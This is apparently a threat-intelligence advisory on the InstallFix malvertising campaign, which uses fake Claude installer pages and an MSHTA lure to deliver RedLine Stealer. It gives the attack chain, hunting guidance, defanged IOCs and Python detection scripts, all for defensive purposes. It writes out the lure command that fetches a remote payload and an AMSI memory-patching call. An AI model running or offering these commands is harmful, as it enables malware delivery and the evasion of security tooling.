
InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise

The InstallFix campaign leverages malvertising to distribute fake Claude AI installation pages, tricking users into executing malicious MSHTA commands. This initiates a multi-stage, fileless infection chain utilizing a ZIP/HTA polyglot, COM object abuse, and AMSI/SSL bypasses to deliver a payload associated with RedLine Stealer. The campaign demonstrates advanced evasion tactics, including the use of victim-unique C2 subdomains derived from machine fingerprints.

Sens: Immediate | Conf: high | Analyzed: 2026-05-05 | Analyzed by: Google

Authors: Allixon Kristoffer Francisco, Gabriel Nicoleta, Jonna Santos, Mohamed Fahmy

Actors: InstallFix, Fake Claude Installer, RedLine Stealer

Source: Trend Micro

IOCs: 13

Detection / Hunter: Google

What Happened

Cybercriminals are running fake Google Ads that pretend to be installation guides for Anthropic's Claude AI assistant. Anyone searching for Claude AI, including developers and general users on Windows and macOS, is at risk of clicking these malicious links. This matters because the fake websites trick users into copying and pasting a command that secretly installs malware designed to steal sensitive data and passwords. To stay safe, users should only download software directly from official vendor websites and never copy-paste installation commands from unverified sources.

Key Takeaways

  • The InstallFix campaign uses malicious Google Ads to promote fake Claude AI installation pages.
  • Attackers utilize the 'ClickFix' social engineering tactic, tricking users into copying and executing malicious MSHTA or curl commands.
  • The infection chain uses a ZIP/HTA polyglot file to bypass static analysis and execute VBScript silently via COM objects.
  • Advanced evasion techniques include AMSI memory patching, SSL certificate validation bypass, and victim-unique C2 subdomains.
  • The final payload is executed filelessly in memory and is associated with RedLine Stealer.

Affected Systems

  • Windows
  • macOS

Attack Chain

The attack begins with malvertising on Google Ads, directing users searching for Claude AI to a fake installation page. The page uses a 'ClickFix' lure, instructing users to copy and paste an MSHTA command into their terminal. This command downloads a ZIP/HTA polyglot file (claude.msixbundle) which executes embedded VBScript silently via a COM object. The VBScript reconstructs an obfuscated PowerShell command that bypasses AMSI and SSL validation, generates a unique victim ID, and fetches a final fileless payload (RedLine Stealer) from a remote C2 server, while establishing persistence via scheduled tasks.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: Yes
  • Platforms: TrendAI Vision One

The article provides proprietary TrendAI Vision One XDR search queries to hunt for MSHTA spawning shells and encoded PowerShell executions.

Detection Engineering Assessment

  • EDR Visibility: High. The attack relies heavily on process creation (mshta spawning cmd/powershell), command-line arguments, and PowerShell execution, all of which are highly visible to modern EDR solutions with AMSI integration.
  • Network Visibility: Medium. While the initial payload download is visible, the C2 communication uses HTTPS and victim-unique subdomains, making static network IOC blocking less effective.
  • Detection Difficulty: Moderate. The heavy use of obfuscation, variable splitting, and fileless execution complicates static analysis, but the initial MSHTA execution and process ancestry are strong, reliable behavioral indicators.

Required Log Sources

  • Process Creation (Event ID 4688 / Sysmon 1)
  • PowerShell Operational (Event ID 4104)
  • Network Connections (Sysmon 3)
  • Scheduled Task Creation (Event ID 4698)

Hunting Hypotheses

  • Hypothesis: Look for mshta.exe executing with command-line arguments containing remote URLs, especially those ending in unusual extensions like .msixbundle or .zip. | Telemetry: Process Creation | ATT&CK Stage: Execution | FP Risk: Low
  • Hypothesis: Identify instances where mshta.exe spawns command shells (cmd.exe, powershell.exe, wscript.exe) as child processes. | Telemetry: Process Creation | ATT&CK Stage: Execution | FP Risk: Low
  • Hypothesis: Detect cmd.exe executing with delayed variable expansion (/v:on) combined with variable splitting techniques (e.g., set x=pow) to reconstruct script interpreters. | Telemetry: Process Creation | ATT&CK Stage: Defense Evasion | FP Risk: Medium
  • Hypothesis: Monitor PowerShell script block logs for memory patching API calls, specifically [Runtime.InteropServices.Marshal]::WriteInt32 targeting AMSI contexts. | Telemetry: PowerShell Operational Logs | ATT&CK Stage: Defense Evasion | FP Risk: Low

Control Gaps

  • Standard web filtering may miss newly registered malvertising domains.
  • Static AV may fail to flag the ZIP/HTA polyglot due to the presence of valid Microsoft signatures on the embedded archive files.

Key Behavioral Indicators

  • mshta.exe spawning cmd.exe or powershell.exe
  • cmd.exe using /v:on and variable splitting to launch PowerShell
  • PowerShell executing with -E or -EncodedCommand immediately after a suspicious parent process
  • Creation of scheduled tasks with randomized or suspicious names (e.g., 'servicehmb') executing script interpreters
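The hunting hypotheses and the behavioral indicators above can be expressed as detection logic over process-creation and script-block telemetry. The following is an added example, not detection logic from Trend Micro or the Vision One queries the article refers to. It assumes a Sysmon-style process record carrying pid, image path, command line and parent fields (Event ID 1 / 4688 equivalents) plus a list of 4104 script-block texts; the sample telemetry is constructed for the demo, modelled on the command lines quoted on this page, and the encoded-command blob is a placeholder.

```python
"""Behavioral detection for the InstallFix process chain (constructed example).

Checks Sysmon-style process-creation records and PowerShell 4104 script-block
text for: mshta.exe fetching a remote URL, mshta.exe spawning shells, cmd.exe
delayed expansion with variable splitting, encoded PowerShell with mshta.exe
in its ancestry, and AMSI memory patching via Marshal::WriteInt32.
"""
import re
from dataclasses import dataclass
from typing import Optional

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
# Extensions this page calls out as unusual for content fetched by mshta.
SUSPICIOUS_EXT = re.compile(r"\.(msixbundle|zip)\b", re.IGNORECASE)
DELAYED_EXPANSION = re.compile(r"/v(?::on)?\b", re.IGNORECASE)
VAR_SPLIT = re.compile(r"\bset\s+\w+=\w+", re.IGNORECASE)
AMSI_PATCH = re.compile(r"Marshal\]::WriteInt32", re.IGNORECASE)
# powershell.exe accepts any unique prefix of -EncodedCommand, plus the -ec alias.
ENCODED_FLAGS = {"-" + "encodedcommand"[:i] for i in range(1, 15)} | {"-ec"}


@dataclass
class ProcEvent:
    pid: int
    image: str            # full path of the created process
    cmdline: str
    parent_pid: Optional[int]
    parent_image: str


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def has_encoded_flag(cmdline: str) -> bool:
    return any(tok.lower() in ENCODED_FLAGS for tok in cmdline.split())


def ancestry(ev: ProcEvent, by_pid: dict, depth: int = 5) -> list:
    """Walk parent links upward; returns lowercase parent image names, nearest first."""
    chain, cur = [], ev
    while cur is not None and cur.parent_pid is not None and len(chain) < depth:
        chain.append(basename(cur.parent_image))
        cur = by_pid.get(cur.parent_pid)
    return chain


def classify_process(ev: ProcEvent, chain: list) -> list:
    hits, img, cl = [], basename(ev.image), ev.cmdline
    parent = chain[0] if chain else ""
    if img == "mshta.exe" and REMOTE_URL.search(cl):
        hits.append("mshta_remote_url")
        if SUSPICIOUS_EXT.search(cl):
            hits.append("mshta_suspicious_extension")
    if parent == "mshta.exe" and img in SHELLS:
        hits.append("mshta_spawns_shell")
    if img == "cmd.exe" and DELAYED_EXPANSION.search(cl) and VAR_SPLIT.search(cl):
        hits.append("cmd_delayed_expansion_var_split")
    # Encoded PowerShell is common in admin tooling, so require mshta.exe anywhere
    # in the ancestry (not only as direct parent) to keep the FP rate low.
    if img in POWERSHELL and has_encoded_flag(cl) and "mshta.exe" in chain:
        hits.append("encoded_powershell_under_mshta")
    return hits


def classify_script_block(text: str) -> list:
    if AMSI_PATCH.search(text) and "amsi" in text.lower():
        return ["amsi_memory_patch"]
    return []


def evaluate(events: list, script_blocks: list) -> dict:
    """Return {pid or 'scriptblock:N': [indicator, ...]} for every record that fired."""
    by_pid = {e.pid: e for e in events}
    findings = {}
    for ev in events:
        hits = classify_process(ev, ancestry(ev, by_pid))
        if hits:
            findings[ev.pid] = hits
    for i, text in enumerate(script_blocks):
        hits = classify_script_block(text)
        if hits:
            findings[f"scriptblock:{i}"] = hits
    return findings


# Constructed sample telemetry; "QQBBAEEA" is a placeholder blob, not a real stager.
SAMPLE_EVENTS = [
    ProcEvent(100, r"C:\Windows\explorer.exe", "explorer.exe", None, ""),
    ProcEvent(200, r"C:\Windows\System32\mshta.exe",
              "mshta https://download-version.1-5-8.com/claude.msixbundle",
              100, r"C:\Windows\explorer.exe"),
    ProcEvent(300, r"C:\Windows\System32\cmd.exe",
              'cmd /v:on /c "set x=pow&& set y=ershell&& !x!!y! -nop -w hidden -E QQBBAEEA"',
              200, r"C:\Windows\System32\mshta.exe"),
    ProcEvent(400, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -nop -w hidden -E QQBBAEEA", 300, r"C:\Windows\System32\cmd.exe"),
    # Benign control: encoded command launched by a service host, no mshta ancestry.
    ProcEvent(500, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -E QQBBAEEA", 1, r"C:\Windows\System32\svchost.exe"),
]
SAMPLE_SCRIPT_BLOCKS = [
    "Get-Service | Where-Object Status -eq Running",
    "[Runtime.InteropServices.Marshal]::WriteInt32($amsiContext, 0x41414141)",
]

if __name__ == "__main__":
    for key, hits in evaluate(SAMPLE_EVENTS, SAMPLE_SCRIPT_BLOCKS).items():
        print(key, hits)
```

The ancestry walk is the part worth keeping when porting this to a SIEM: matching `powershell.exe -E` on its direct parent alone misses the cmd.exe hop this chain uses, while matching it without any ancestry condition would fire on routine scheduled-task and management-agent activity.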

False Positive Assessment

  • Low. The combination of MSHTA fetching remote payloads, spawning command shells, and executing obfuscated PowerShell with AMSI bypasses is highly indicative of malicious intent and rarely seen in legitimate administrative activity.

Recommendations

Immediate Mitigation

  • Block access to the identified malicious domains and IP addresses at the firewall or secure web gateway.
  • Terminate any active mshta.exe processes exhibiting suspicious child process spawning or remote network connections.

Infrastructure Hardening

  • Restrict or completely disable the execution of legacy scripting tools like mshta.exe, wscript.exe, and cscript.exe via AppLocker or WDAC if not required for business operations.
  • Ensure endpoint protection solutions are configured to block, not just alert on, suspicious script interpreter behavior.

User Protection

  • Deploy DNS filtering to prevent users from reaching newly registered or suspicious domains associated with malvertising.
  • Ensure EDR agents are actively monitoring and blocking AMSI bypass attempts.

Security Awareness

  • Educate employees on the risks of copying and pasting installation commands from unverified websites (ClickFix attacks).
  • Train users to be highly skeptical of sponsored search results and to navigate directly to official vendor websites for software downloads.

MITRE ATT&CK Mapping

  • T1566.002 - Phishing: Spearphishing Link
  • T1583.008 - Acquire Infrastructure: Malvertising
  • T1218.005 - System Binary Proxy Execution: Mshta
  • T1559.001 - Inter-Process Communication: Component Object Model
  • T1059.005 - Command and Scripting Interpreter: Visual Basic
  • T1027 - Obfuscated Files or Information
  • T1059.001 - Command and Scripting Interpreter: PowerShell
  • T1562 - Impair Defenses
  • T1053.005 - Scheduled Task/Job: Scheduled Task

Additional IOCs

  • IPs:
    • 104[.]21[.]0[.]95 - Outbound connection IP observed during dynamic analysis.
    • 185[.]177[.]239[.]255 - Outbound connection IP observed during dynamic analysis.
  • Domains:
    • claude-code-app[.]gitlab[.]io - Fake Claude AI installation landing page hosted on GitLab Pages.
    • download[.]version-516[.]com - Alternative payload delivery domain observed in telemetry images.
    • hosted-by[.]yeezyhost[.]net - Domain associated with RedLine Stealer infrastructure and the identified IP addresses.
  • URLs:
    • hxxps://download[.]version-516[.]com/other - Alternative payload URL observed in scheduled task persistence mechanisms.
  • File Hashes:
    • 811fbf0ff6b6acabe4b545e493ec0dd0178a0302 (SHA1) - Hash of the recovered Stage 5 payload file.
    • 2f04ba77bb841111036b979fc0dab7fcbae99749718ae1dd6fd348d4495b5f74 (SHA256) - Hash of the recovered Stage 5 payload file.
  • File Paths:
    • claude.msixbundle - Filename of the ZIP/HTA polyglot downloaded by the initial MSHTA command.
  • Command Lines:
    • Purpose: Initial access lure tricking users into downloading and executing the remote HTA payload. | Tools: mshta.exe | Stage: Initial Access | mshta https://download-version.1-5-8.com/claude.msixbundle
    • Purpose: Reconstructs the 'powershell' string to evade static detection and executes a base64-encoded stager. | Tools: cmd.exe, powershell.exe | Stage: Execution
    • Purpose: Patches the AMSI context in memory to blind security products for the remainder of the session. | Tools: powershell.exe | Stage: Defense Evasion | [Runtime.InteropServices.Marshal]::WriteInt32(<amsiContext>, 0x41414141)
    • Purpose: Creates a scheduled task for persistence to ensure the malware runs automatically. | Tools: VBScript, Task Scheduler | Stage: Persistence | RegisterTaskDefinition("servicehmb", ProcessInstitution, 6, , , 3)
  • Other:
    • servicehmb - Name of the scheduled task created for persistence.
    • AMSI_RESULT_NOT_DETECTED - String used as an XOR key for payload deobfuscation.
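Because the C2 uses victim-unique subdomains, a watchlist of the exact hosts above will miss most beacons. The following added example (not Trend Micro's tooling) refangs the network indicators listed on this page and matches Sysmon Event ID 3 style connection records on the IP, the exact host, and the registrable parent domain. It assumes a record with pid, image, destination IP and (possibly empty) destination hostname; the parent-domain derivation takes the last two labels with no public-suffix handling, and `gitlab.io` is excluded from widening because it is a shared hosting parent. The sample events, including the fingerprint-style subdomain, are constructed.

```python
"""IOC matcher for Sysmon Event ID 3 records (constructed example).

Refangs the defanged indicators from this page and matches connection events
on IP, exact host, and registrable parent domain so that victim-unique C2
subdomains still hit a watchlist built from the published hosts.
"""
from dataclasses import dataclass

DEFANGED_IPS = ["104[.]21[.]0[.]95", "185[.]177[.]239[.]255"]
DEFANGED_DOMAINS = ["claude-code-app[.]gitlab[.]io", "download[.]version-516[.]com",
                    "hosted-by[.]yeezyhost[.]net"]
DEFANGED_URLS = ["hxxps://download[.]version-516[.]com/other"]
# Host taken from the initial mshta command line quoted on this page.
EXTRA_HOSTS = ["download-version.1-5-8.com"]
# Shared hosting parents that must not be widened to a suffix match (assumption).
SHARED_PARENTS = {"gitlab.io"}


def refang(value: str) -> str:
    return (value.replace("[.]", ".").replace("hxxps://", "https://")
            .replace("hxxp://", "http://").lower())


def host_of(url: str) -> str:
    return url.split("://", 1)[-1].split("/", 1)[0].split("@")[-1].split(":")[0]


def parent_domain(host: str) -> str:
    """Last two labels; no public-suffix list, so co.uk-style names need care."""
    labels = host.rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


@dataclass
class Watchlist:
    ips: set
    hosts: set
    parents: set


def build_watchlist(suffix_match: bool = True) -> Watchlist:
    hosts = ({refang(d) for d in DEFANGED_DOMAINS}
             | {host_of(refang(u)) for u in DEFANGED_URLS} | set(EXTRA_HOSTS))
    parents = set()
    if suffix_match:
        parents = {parent_domain(h) for h in hosts} - SHARED_PARENTS
    return Watchlist({refang(ip) for ip in DEFANGED_IPS}, hosts, parents)


@dataclass
class NetEvent:
    pid: int
    image: str
    dest_ip: str
    dest_host: str   # empty when no hostname was resolved


def match(events: list, wl: Watchlist) -> dict:
    """Return {pid: [reason, ...]} for events that touch the watchlist."""
    out = {}
    for ev in events:
        reasons = []
        if ev.dest_ip in wl.ips:
            reasons.append(f"ip:{ev.dest_ip}")
        h = ev.dest_host.lower().rstrip(".")
        if h:
            if h in wl.hosts:
                reasons.append(f"host:{h}")
            elif parent_domain(h) in wl.parents:
                reasons.append(f"parent:{parent_domain(h)}")
        if reasons:
            out[ev.pid] = reasons
    return out


# Constructed sample connections; the fingerprint-style label is invented.
SAMPLE_EVENTS = [
    NetEvent(401, "powershell.exe", "203.0.113.10", "a1b2c3d4e5f6.version-516.com"),
    NetEvent(402, "powershell.exe", "185.177.239.255", ""),
    NetEvent(403, "chrome.exe", "198.51.100.7", "www.example.com"),
    NetEvent(404, "chrome.exe", "203.0.113.11", "docs.gitlab.io"),
]

if __name__ == "__main__":
    for pid, reasons in match(SAMPLE_EVENTS, build_watchlist()).items():
        print(pid, reasons)
```

Run with `suffix_match=False` to see what an exact-host watchlist alone catches: only the IP hit survives, which is the gap the Network Visibility assessment above describes.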